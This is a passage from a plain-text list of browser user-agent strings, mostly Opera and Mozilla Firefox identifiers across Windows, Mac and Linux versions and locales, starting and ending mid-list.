U; hu) Presto/2.9.168 Version/11.50\nOpera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54\nOpera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00\nOpera/9.80 (X11; Linux i686; U; ja) Presto/2.7.62 Version/11.01\nOpera/9.80 (X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61\nOpera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11\nOpera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10\nOpera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01\nOpera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9.168 Version/11.50\nOpera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10\nOpera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00\nOpera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01\nOpera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10\nOpera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9\nOpera/9.99 (X11; U; sk)\nOpera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2\nOpera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60\nOpera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60\nOpera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00\nOpera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00\nOpera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02\n\n# Mozilla Firefox\n\nMozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)\nMozilla/4.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/2010324480 Firefox/3.5.4\nMozilla/4.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.7) Gecko/2008398325 Firefox/3.1.4\nMozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0\nMozilla/5.0 (Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0a2) Gecko/20111101 Firefox/9.0a2\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0\nMozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1\nMozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009122115 Firefox/3.0.17\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090204 Firefox/3.1b3pre\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9b4) Gecko/2008030317 Firefox/3.0b4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.23) Gecko/20110920 Firefox/3.6.23\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; he; rv:1.9.1b4pre) Gecko/20100405 Firefox/3.6.3plugin1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; de-AT; rv:1.9.1.8) Gecko/20100625 Firefox/3.6.6\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12pre) Gecko/20080122 Firefox/2.0.0.12pre\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.13) Gecko/20080313 Firefox\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9.2.19) Gecko/20110707 Firefox/3.6.19\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040614 Firefox/0.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.4\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20061110 Firefox/2.0b3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060320 Firefox/2.0a1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060322 Firefox/2.0a1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.7.3) Gecko/20040913 Firefox/0.10\nMozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.8.1.16) Gecko/20080702 Firefox\nMozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Firefox/22.0\nMozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13\nMozilla/5.0 (U; Windows NT 5.1; en-GB; rv:1.8.1.17) Gecko/20080808 Firefox/2.0.0.17\nMozilla/5.0 (Windows 98; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 5.0; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0\nMozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0\nMozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0\nMozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20120405 Firefox/14.0a1\nMozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/13.0.1\nMozilla/5.0 (Windows NT 5.1; rv:1.9a1) Gecko/20060217 Firefox/1.6a1\nMozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 5.1; rv:2.0b13pre) Gecko/20110223 Firefox/4.0b13pre\nMozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre\nMozilla/5.0 (Windows NT 5.1; rv:2.0b9pre) Gecko/20110105 Firefox/4.0b9pre\nMozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0\nMozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0\nMozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\nMozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0 FirePHP/0.6\nMozilla/5.0 (Windows NT 5.1; rv:8.0; en_us) Gecko/20100101 Firefox/8.0\nMozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 5.1; U; tr; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5\nMozilla/5.0 (Windows NT 5.2; rv:2.0b13pre) Gecko/20110304 Firefox/4.0b13pre\nMozilla/5.0 (Windows NT 5.2; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0\nMozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1\nMozilla/5.0 (Windows NT 6.0; U; hu; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (Windows NT 6.0; U; sv; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\nMozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 6.1; de;rv:12.0) Gecko/20120403211507 Firefox/12.0\nMozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0\nMozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/14.0.1\nMozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/ 20120405 Firefox/14.0.1\nMozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/18.0.1\nMozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20120405 Firefox/14.0a1\nMozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\nMozilla/5.0 (Windows NT 6.1; rv:1.9) Gecko/20100101 Firefox/4.0\nMozilla/5.0 (Windows NT 6.1; rv:2.0b10) Gecko/20110126 Firefox/4.0b10\nMozilla/5.0 (Windows NT 6.1; rv:2.0b10pre) Gecko/20110113 Firefox/4.0b10pre\nMozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre\nMozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre\nMozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre\nMozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20110319 Firefox/4.0\nMozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0\nMozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3\nMozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/19.0\nMozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/7.0\nMozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0\nMozilla/5.0 (Windows NT 6.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0\nMozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1\nMozilla/5.0 (Windows NT 6.1; U;WOW64; de;rv:11.0) Gecko Firefox/11.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:14.0) Gecko/20120405 Firefox/14.0a1\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b10pre) Gecko/20110118 Firefox/4.0b10pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110129 Firefox/4.0b11pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110131 Firefox/4.0b11pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110208 Firefox/4.2a1pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110323 Firefox/4.2a1pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko Firefox/11.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2\nMozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0\nMozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0\nMozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0\nMozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 Firefox/9.0.1\nMozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0\nMozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1\nMozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1\nMozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0\nMozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0\nMozilla/5.0 (Windows NT 6.2; WOW64; rv:15.0) Gecko/20120910144328 Firefox/15.0.2\nMozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1\nMozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0\nMozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\nMozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\nMozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Win98; en-US; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8\nMozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 (ax)\nMozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Win98; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20040913 Firefox/0.10\nMozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20041001 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Windows NT 4.0; en-US; rv:1.8.0.2) Gecko/20060418 Firefox/1.5.0.2;\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040626 Firefox/0.9.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050321 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.4) Gecko/20070509 Firefox/2.0.0\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.0.2) Gecko/2008092313 Firefox/3.1.6\nMozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.0; fr; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.0; fr; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.0; pl; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13\nMozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10\nMozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20041001 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1) Gecko/20060111 Firefox/0.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; ca; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20\nMozilla/5.0 (Windows; U; Windows NT 5.1; da-DK; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7) Gecko/20040626 Firefox/0.9.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.9.2.20) Gecko/20110803 Firefox\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19\nMozilla/5.0 (Windows; U; Windows NT 